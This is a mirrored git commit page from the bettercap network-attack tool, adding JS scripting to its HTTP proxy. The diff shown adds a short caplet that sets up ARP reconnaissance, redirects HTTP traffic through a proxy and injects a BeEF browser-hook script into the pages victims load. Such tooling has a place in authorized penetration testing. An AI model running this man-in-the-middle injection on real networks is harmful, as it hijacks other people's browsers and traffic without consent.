mirror of
https://github.com/bettercap/bettercap
synced 2025-08-14 18:57:17 -07:00
new: http proxy can now be scripted with js files
This commit is contained in:
parent
5b209890c1
commit
98d1a028ed
12 changed files with 345 additions and 124 deletions
15
caplets/beef-passive.cap
Normal file
15
caplets/beef-passive.cap
Normal file
|
@ -0,0 +1,15 @@
|
|||
# inject beef hook
|
||||
set http.proxy.script caplets/beef-inject.js
|
||||
# keep reading arp table for network mapping
|
||||
net.recon on
|
||||
# redirect http traffic to a proxy
|
||||
http.proxy on
|
||||
# wait for everything to start properly
|
||||
sleep 1
|
||||
active
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
Loading…
Add table
Add a link
Reference in a new issue